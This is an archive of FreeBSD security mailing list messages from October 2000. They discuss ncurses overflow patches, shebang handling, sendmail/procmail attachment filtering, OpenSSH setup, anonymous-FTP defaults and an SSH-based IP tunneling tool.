TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 10 Oct 2000, Trevor Johnson wrote: > The fixes were applied in ncurses-20001007. We have ncurses-20000701. > > I'm attempting to prepare ncurses-20001009 for importing: > http://people.freebsd.org/~trevor/ncurses/ . I've mentioned it to Peter > Wemm. It needs more testing though (I haven't even done a "make world"). Is the patch just to not read .terminfo from the current directory when executing setuid+setgid apps? (Just checking if it's the same as the patch that openbsd has applied.) Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 19:20:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 67BE837B502 for ; Tue, 10 Oct 2000 19:20:27 -0700 (PDT) Received: (from kris@localhost) by citusc17.usc.edu (8.9.3/8.9.3) id TAA05121; Tue, 10 Oct 2000 19:20:48 -0700 (PDT) Date: Tue, 10 Oct 2000 19:20:47 -0700 From: Kris Kennaway To: Igor Cc: freebsd-security@FreeBSD.ORG Subject: Re: racoon problem Message-ID: <20001010192047.C5034@citusc17.usc.edu> References: <00b301c032d3$9cd97880$1aa7dac3@krovatka.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <00b301c032d3$9cd97880$1aa7dac3@krovatka.ru>; from igorp@mail.rbc.ru on Tue, Oct 10, 2000 at 08:03:21PM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 10, 2000 at 08:03:21PM +0400, Igor wrote: > I think the password for crypt packets at this time is must be established > what is wrong ? Talk to snap-users@kame.net where the racoon developers hang out, and send full debugging output (-d 0xffffffff), I think. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 20:10:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 91BF437B502 for ; Tue, 10 Oct 2000 20:10:51 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e9B3Ani16971; Tue, 10 Oct 2000 21:10:49 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA32653; Tue, 10 Oct 2000 21:10:48 -0600 (MDT) Message-Id: <200010110310.VAA32653@harmony.village.org> To: Mike Silbersack Subject: Re: ncurses buffer overflows (fwd) Cc: Trevor Johnson , freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Tue, 10 Oct 2000 21:09:33 CDT." References: Date: Tue, 10 Oct 2000 21:10:48 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Mike Silbersack writes: : Is the patch just to not read .terminfo from the current directory when : executing setuid+setgid apps? (Just checking if it's the same as the : patch that openbsd has applied.) There are several things that were fixed in this round of patches. I think that this is one of them, but I have it on my list of things to check once Peter imports the new ncurses. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 21:10: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 79E2437B66F; Tue, 10 Oct 2000 21:10:02 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id AAA37803; Wed, 11 Oct 2000 00:10:00 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Wed, 11 Oct 2000 00:09:59 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: "Brian F. Feldman" Cc: Peter Pentchev , achilov@granch.ru, Przemyslaw Frasunek , freebsd-security@FreeBSD.org Subject: Re: ncurses buffer overflows (fwd) In-Reply-To: <200010110038.e9B0cH562984@green.dyndns.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 10 Oct 2000, Brian F. Feldman wrote: > > Uhm.. it explicitly says '#!/bin/csh' at the start; why are you running > > it with 'sh'? > > The canonical lazy person's execution method for scripts is "shell > script.shell", because it is easier than "chmod +x script.shell; ./ > script.shell". C shell scripts are supposed to be named .csh for > consistency, or nothing at all. We seem to have some bugs in how shells load and run shell scripts for other shells, and in handling of scripts with invalid or bad #! lines at the beginning. I think I filed a PR a while ago about handling of scripts in single-user mode in particular. If you feel bored someday, you could try and fix them :-). The general gyst is the following: shells (especially when running in single-user mode for some reason) will tend to execute shell scripts themselves, rather than using the interpreter defined in the file (not in multi-user mode?). When a failure occurs in locating or executing the interpreter, or if interpreters are recursive, rather than failing (as the kernel execve call does), it will go ahead and execute it using the current shell. Doubt this could be exploited as a security bug, but it is probably "wrong". The kernel seems to correctly handle layered interpreters by returning an image error (an interpreter cannot be another interpreter, preventing recursion). Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 21:44:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 3CA5037B66F; Tue, 10 Oct 2000 21:44:27 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Tue, 10 Oct 2000 21:42:18 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e9B4hXh01727; Tue, 10 Oct 2000 21:43:33 -0700 (PDT) (envelope-from cjc) Date: Tue, 10 Oct 2000 21:43:32 -0700 From: "Crist J . Clark" To: Robert Watson Cc: "Brian F. Feldman" , Peter Pentchev , achilov@granch.ru, Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) Message-ID: <20001010214332.G25121@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <200010110038.e9B0cH562984@green.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from rwatson@FreeBSD.ORG on Wed, Oct 11, 2000 at 12:09:59AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 11, 2000 at 12:09:59AM -0400, Robert Watson wrote: > On Tue, 10 Oct 2000, Brian F. Feldman wrote: > > > Uhm.. it explicitly says '#!/bin/csh' at the start; why are you running > > > it with 'sh'? > > > > The canonical lazy person's execution method for scripts is "shell > > script.shell", because it is easier than "chmod +x script.shell; ./ > > script.shell". C shell scripts are supposed to be named .csh for > > consistency, or nothing at all. > > We seem to have some bugs in how shells load and run shell scripts for > other shells, and in handling of scripts with invalid or bad #! lines at > the beginning. I think I filed a PR a while ago about handling of scripts > in single-user mode in particular. If you feel bored someday, you could > try and fix them :-). The general gyst is the following: shells > (especially when running in single-user mode for some reason) will tend to > execute shell scripts themselves, rather than using the interpreter > defined in the file (not in multi-user mode?). When a failure occurs in > locating or executing the interpreter, or if interpreters are recursive, > rather than failing (as the kernel execve call does), it will go ahead and > execute it using the current shell. Doubt this could be exploited as a > security bug, but it is probably "wrong". The kernel seems to correctly > handle layered interpreters by returning an image error (an interpreter > cannot be another interpreter, preventing recursion). Hmmm... I always thought the fact the sh-bang started with a '#' was part of their magic. When you read in a file with an interpreter, it reads the file as a flat file. That first line starts with a '#'; it just a comment, right? What interpreters actually use a sh-bang to change the interpreter? I thought sh-bangs were only used by exec calls. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 23:50:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.kyx.net (cr95838-b.crdva1.bc.wave.home.com [24.113.50.147]) by hub.freebsd.org (Postfix) with ESMTP id 96A4337B66F; Tue, 10 Oct 2000 23:50:06 -0700 (PDT) Received: from smp.kyx.net (unknown [10.22.22.45]) by mail.kyx.net (Postfix) with SMTP id D5B961DC05; Tue, 10 Oct 2000 23:50:33 -0700 (PDT) From: Dragos Ruiu Organization: kyx.net To: Robert Watson , "Brian F. Feldman" Subject: Re: ncurses buffer overflows (fwd) Date: Tue, 10 Oct 2000 23:46:52 -0700 X-Mailer: KYX-CP/M [version core00-mail-92] Content-Type: text/plain Cc: Peter Pentchev , achilov@granch.ru, Przemyslaw Frasunek , freebsd-security@FreeBSD.org References: In-Reply-To: MIME-Version: 1.0 Message-Id: <0010102350400T.40602@smp.kyx.net> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 10 Oct 2000, Robert Watson wrote: >The general gyst is the following: shells > (especially when running in single-user mode for some reason) will tend to > execute shell scripts themselves, rather than using the interpreter > defined in the file (not in multi-user mode?). This behaviour seems to make sense for single user mode, where you may have dropped down to with intent of repairing things. Not all the partitions may be mounted and those other shells may not be available.... --dr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 11 1:32:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id B8ED537B503; Wed, 11 Oct 2000 01:32:43 -0700 (PDT) Received: by static.unixfreak.org (Postfix, from userid 1000) id F387D1F22; Wed, 11 Oct 2000 01:06:28 -0700 (PDT) Subject: Re: ncurses buffer overflows (fwd) In-Reply-To: <20001010214332.G25121@149.211.6.64.reflexcom.com> "from Crist J . Clark at Oct 10, 2000 09:43:32 pm" To: cjclark@alum.mit.edu Date: Wed, 11 Oct 2000 01:06:28 -0700 (PDT) Cc: Robert Watson , "Brian F. Feldman" , Peter Pentchev , achilov@granch.ru, Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG From: Dima Dorfman Reply-To: dima@unixfreak.org X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Message-Id: <20001011080628.F387D1F22@static.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Wed, Oct 11, 2000 at 12:09:59AM -0400, Robert Watson wrote: > > On Tue, 10 Oct 2000, Brian F. Feldman wrote: > > > > Uhm.. it explicitly says '#!/bin/csh' at the start; why are you running > > > > it with 'sh'? > > > > > > The canonical lazy person's execution method for scripts is "shell > > > script.shell", because it is easier than "chmod +x script.shell; ./ > > > script.shell". C shell scripts are supposed to be named .csh for > > > consistency, or nothing at all. > > > > We seem to have some bugs in how shells load and run shell scripts for > > other shells, and in handling of scripts with invalid or bad #! lines at > > the beginning. I think I filed a PR a while ago about handling of scripts > > in single-user mode in particular. If you feel bored someday, you could > > try and fix them :-). The general gyst is the following: shells > > (especially when running in single-user mode for some reason) will tend to > > execute shell scripts themselves, rather than using the interpreter > > defined in the file (not in multi-user mode?). When a failure occurs in > > locating or executing the interpreter, or if interpreters are recursive, > > rather than failing (as the kernel execve call does), it will go ahead and > > execute it using the current shell. Doubt this could be exploited as a > > security bug, but it is probably "wrong". The kernel seems to correctly > > handle layered interpreters by returning an image error (an interpreter > > cannot be another interpreter, preventing recursion). > > Hmmm... I always thought the fact the sh-bang started with a '#' was > part of their magic. When you read in a file with an interpreter, it > reads the file as a flat file. That first line starts with a '#'; it > just a comment, right? What interpreters actually use a sh-bang to > change the interpreter? I thought sh-bangs were only used by exec > calls. "Me too." It was my impression that the whole '#!/path/to/shell' thing started when people expressed a desire to use csh for their scripts, so someone hacked execve in their kernel to look for '#' as the first byte in the file, and if it's there, execute whatever command follows. Since not all kernels had this hack, the script would still get executed with sh on some systems, so it was decided that the sh comment character be used to keep the old hosts happy. Regards -- Dima Dorfman Finger dima@unixfreak.org for my public PGP key. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 11 4:15:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from server.osny.com.br (osny.com.br [200.215.110.57]) by hub.freebsd.org (Postfix) with ESMTP id 4978E37B502 for ; Wed, 11 Oct 2000 04:15:33 -0700 (PDT) Received: from osny.com.br ([172.20.185.22]) by server.osny.com.br (8.10.1/8.10.1) with ESMTP id e9BBHFt04690 for ; Wed, 11 Oct 2000 09:17:17 -0200 (EDT) Message-ID: <39E43159.E2AE64CC@osny.com.br> Date: Wed, 11 Oct 2000 09:22:33 +0000 From: Michelangelo Pisa Organization: Agencia Maritima Osny X-Mailer: Mozilla 4.7 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Filtering mail Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi list.. When I tried to configure the Procmail to filter e-mail messages in may server to don't come files .vbs .shs .com(virus) I use the following sitaxe in my file sendmail.cf, but after reinicied the sendmail this file show errors how: "Error rewrite line" and (tab expected) who is the problem with my Tab? the sintaxe is correct? #pipe through procmail for processing R$* < @ localhost > $* $#procmail $ @ /etc/procmail/filter.rc $: $1 < @ localhost . procmail . > $2 R$* < @ localhost . > $* $#procmail $ @ /etc/procmail/filter.rc $: $1 < @ localhost . procmail . > $2 R$* < @ localhost . procmail > $* $1 < @ $2. > $3 thanks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 11 7:15:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from envy.vuurwerk.nl (envy.vuurwerk.nl [194.178.232.112]) by hub.freebsd.org (Postfix) with SMTP id 8ED2A37B502 for ; Wed, 11 Oct 2000 07:15:30 -0700 (PDT) Received: (qmail 98782 invoked from network); 11 Oct 2000 14:15:29 -0000 Received: from kesteren.vuurwerk.nl (HELO daemon.vuurwerk.nl) (194.178.232.59) by envy.vuurwerk.nl with SMTP; 11 Oct 2000 14:15:29 -0000 Received: (nullmailer pid 52463 invoked by uid 11109); Wed, 11 Oct 2000 14:15:31 -0000 Date: Wed, 11 Oct 2000 16:15:31 +0200 From: Peter van Dijk To: freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) Message-ID: <20001011161531.C52149@vuurwerk.nl> Mail-Followup-To: Peter van Dijk , freebsd-security@FreeBSD.ORG References: <20001010214332.G25121@149.211.6.64.reflexcom.com> <20001011080628.F387D1F22@static.unixfreak.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001011080628.F387D1F22@static.unixfreak.org>; from dima@unixfreak.org on Wed, Oct 11, 2000 at 01:06:28AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 11, 2000 at 01:06:28AM -0700, Dima Dorfman wrote: [snip] > "Me too." It was my impression that the whole '#!/path/to/shell' > thing started when people expressed a desire to use csh for their > scripts, so someone hacked execve in their kernel to look for '#' as > the first byte in the file, and if it's there, execute whatever > command follows. Since not all kernels had this hack, the script > would still get executed with sh on some systems, so it was decided > that the sh comment character be used to keep the old hosts happy. It requires #!, not just #. Greetz, Peter. -- [ircoper] petervd@vuurwerk.nl - Peter van Dijk / Hardbeat [student] Undernet:#groningen/wallops | IRCnet:/#alliance [developer] EFnet:#qmail _____________ [disbeliever - the world is backwards] (__VuurWerk__(--*- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 11 8: 9:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from crash.ab.videon.ca (crash.ab.videon.ca [206.75.216.220]) by hub.freebsd.org (Postfix) with ESMTP id 2C81037B66D for ; Wed, 11 Oct 2000 08:09:48 -0700 (PDT) Received: from rolf-e-laptop.meccamediagroup.com (firewall.meccamediagroup.com [24.108.76.66]) by crash.ab.videon.ca (8.9.2/8.9.2) with ESMTP id JAA03112 for ; Wed, 11 Oct 2000 09:09:46 -0600 (MDT) Message-Id: <5.0.0.25.2.20001011090329.00a799a8@127.0.0.1> X-Sender: redwards/firewall.meccamediagroup.com@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Version 5.0 Date: Wed, 11 Oct 2000 09:09:54 -0600 To: freebsd-security@FreeBSD.ORG From: Rolf Edwards Subject: FreeBSD 4.1.1 and secure telnet Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am setting up a new box to replace an old 3.1 machine, and I would like to set up some method of telnet using SSH. I seem to have managed to set up OpenSSH 2.2.0p1, but it gives console messages such as "no modules loaded for 'sshd' service" and "fatal: PAM session setup failed: Permission denied" when I try to connect. OpenSSH 2.1.1 installed via the ports collection seems to work. The client software that would be used is Secure CRT. The real question, is what should I be using OpenSSH 2.1.1, 2.2.0p1 or ssh2-2.3.0? Rolf To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 11 8:17:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from bart.acs.nmu.edu (bart.acs.nmu.edu [198.110.193.8]) by hub.freebsd.org (Postfix) with ESMTP id 2662B37B502 for ; Wed, 11 Oct 2000 08:17:18 -0700 (PDT) Received: from wag2.resnet.nmu.edu (wag2.resnet.nmu.edu [204.38.56.104]) by bart.acs.nmu.edu (8.11.1/8.11.1) with SMTP id e9BFH9W24749 for ; Wed, 11 Oct 2000 11:17:09 -0400 (EDT) From: Chris Jesseman Date: Wed, 11 Oct 2000 15:18:47 GMT Message-ID: <20001011.15184774@wag2.resnet.nmu.edu> Subject: FreeBSD 4.1.1 and secure telnet To: freebsd-security@FreeBSD.ORG X-Mailer: Mozilla/3.0 (compatible; StarOffice/5.2;Win32) X-Priority: 3 (Normal) MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Rolf, My 4.1 -STABLE came default install with ssh1 and as long as it's enable= d=20 in inetd it works fine. Is this not true with 4.1.1? Regards, Chris Jesseman I am setting up a new box to replace an old 3.1 machine, and I would lik= e=20 to set up some method of telnet using SSH. I seem to have managed to set up OpenSSH 2.2.0p1, but it gives console=20= messages such as "no modules loaded for 'sshd' service" and "fatal: PAM = session setup failed: Permission denied" when I try to connect. OpenSSH 2.1.1 installed via the ports collection seems to work. The=20= client=20 software that would be used is Secure CRT. The real question, is what should I be using OpenSSH 2.1.1, 2.2.0p1 or=20= ssh2-2.3.0? Rolf To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 11 8:22:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id 7506E37B502 for ; Wed, 11 Oct 2000 08:22:34 -0700 (PDT) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.9.3/8.9.3) with ESMTP id LAA44976 for ; Wed, 11 Oct 2000 11:22:28 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: Date: Wed, 11 Oct 2000 11:22:27 -0400 To: freebsd-security@freebsd.org From: Garance A Drosihn Subject: setup anon-ftp without incoming directory Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org When installing freebsd, one has the option to setup anonymous ftp. I do provide a number of files via anonymous ftp, so I want to set that up. In that initial setup, it seems that you must have some 'incoming' directory. I tried to leave that field blank in the dialog, and I still got an 'incoming' directory which was world writable. Usually I remember to go back and remove that, but I forgot on some recent install (installing 'stable', a few months ago). Have there been any changes to the anon-ftp setup which would allow one to specify NO incoming directory recently? If not, that might be a nice change to make... --- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or drosih@rpi.edu Rensselaer Polytechnic Institute To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 11 10:21:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from secure.smtp.email.msn.com (cpimssmtpu07.email.msn.com [207.46.181.28]) by hub.freebsd.org (Postfix) with ESMTP id C202A37B502 for ; Wed, 11 Oct 2000 10:21:09 -0700 (PDT) Received: from x86nts4 - 216.103.48.12 by email.msn.com with Microsoft SMTPSVC; Wed, 11 Oct 2000 10:20:14 -0700 Message-ID: <00cc01c033a8$a9c70a50$fd01a8c0@pacbell.net> From: "John Howie" To: , "Mike Thompson" References: <4.3.2.7.2.20001008220611.085d2f00@mail.atomz.com> Subject: Re: Encrypted IP tunneling solution Date: Wed, 11 Oct 2000 10:28:24 -0700 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ----- Original Message ----- From: "Mike Thompson" To: Sent: Sunday, October 08, 2000 10:56 PM Subject: Encrypted IP tunneling solution > I've created a fairly simple little application called stun that > essentially combines the functionality of nos-tun with SSH. Stun does for > IP tunneling what sftp does for FTP -- it makes it trivial to set up the > highly secure tunneling of raw IP packets between any two FreeBSD systems > that have SSH and tunneling devices (/dev/tunXX) enabled. [stuff deleted] > BTW, my ultimate goal behind this little application is to get it working > with Windows clients running SSH protocols where it can serve as a very > simple, but secure VPN solution. As one might expect, it has proven to be > much easier to write the FreeBSD/Unix side of things than the Windows side > where a virtual NDIS VxD driver or some similar beast will have to be > implemented. Actually, it might not be as hard as you think. I wrote an IP tunnelling interface for an X.25 (remember that?) card for SunOS 4.X and ported a large chunk of it to Windows NT 3.1 way back. The way I wrote it was to have the tunnelling code running in user space and have that access the dummy interface in the kernel. Sure it was slower than a pure kernel solution but back then the graphics was all in user space too. I might have some free time coming up so let me know if you need help. I'll see if I can find the code. > Mike Thompson > mike@atomz.com > CTO/Co-Founder Atomz.com john... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 11 12:46:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id AC0E737B502 for ; Wed, 11 Oct 2000 12:46:07 -0700 (PDT) Received: (from kris@localhost) by citusc17.usc.edu (8.9.3/8.9.3) id MAA07814; Wed, 11 Oct 2000 12:46:28 -0700 (PDT) Date: Wed, 11 Oct 2000 12:46:28 -0700 From: Kris Kennaway To: Rolf Edwards Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD 4.1.1 and secure telnet Message-ID: <20001011124628.D7729@citusc17.usc.edu> References: <5.0.0.25.2.20001011090329.00a799a8@127.0.0.1> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <5.0.0.25.2.20001011090329.00a799a8@127.0.0.1>; from redwards@meccamediagroup.com on Wed, Oct 11, 2000 at 09:09:54AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 11, 2000 at 09:09:54AM -0600, Rolf Edwards wrote: > I am setting up a new box to replace an old 3.1 machine, and I would like > to set up some method of telnet using SSH. > > I seem to have managed to set up OpenSSH 2.2.0p1, but it gives console > messages such as "no modules loaded for 'sshd' service" and "fatal: PAM > session setup failed: Permission denied" when I try to connect. Sounds like you're using the 'portable' version, not from ports. It's expecting a line in /etc/pam.conf to tell it how to authenticate. > OpenSSH 2.1.1 installed via the ports collection seems to work. The client > software that would be used is Secure CRT. > > The real question, is what should I be using OpenSSH 2.1.1, 2.2.0p1 or > ssh2-2.3.0? The version which comes with FreeBSD 4.1 or later. This one doesnt support PAM though. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 11 13: 4: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id E0DCE37B502 for ; Wed, 11 Oct 2000 13:03:56 -0700 (PDT) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id PAA16750; Wed, 11 Oct 2000 15:03:51 -0500 (CDT) (envelope-from jeff-ml@mountin.net) Received: from dial-71.max1.wa.cyberlynk.net(207.227.118.71) by peak.mountin.net via smap (V1.3) id sma016748; Wed Oct 11 15:03:25 2000 Message-Id: <4.3.2.20001011145807.00b85580@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Version 4.3 Date: Wed, 11 Oct 2000 15:03:30 -0500 To: Dragos Ruiu , Robert.Watson@peak.mountin.net From: "Jeffrey J. Mountin" Subject: Re: ncurses buffer overflows (fwd) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <0010102350400T.40602@smp.kyx.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:46 PM 10/10/00 -0700, Dragos Ruiu wrote: CC's trimmed >On Tue, 10 Oct 2000, Robert Watson wrote: > >The general gyst is the following: shells > > (especially when running in single-user mode for some reason) will tend to > > execute shell scripts themselves, rather than using the interpreter > > defined in the file (not in multi-user mode?). > >This behaviour seems to make sense for single user mode, >where you may have dropped down to with intent of repairing >things. Not all the partitions may be mounted and those >other shells may not be available.... Don't normally run shell scripts in single user mode, but all the system shells are in /bin and should be available. Always make to add ksh in there as well. The other day made a mistake and did a 'sh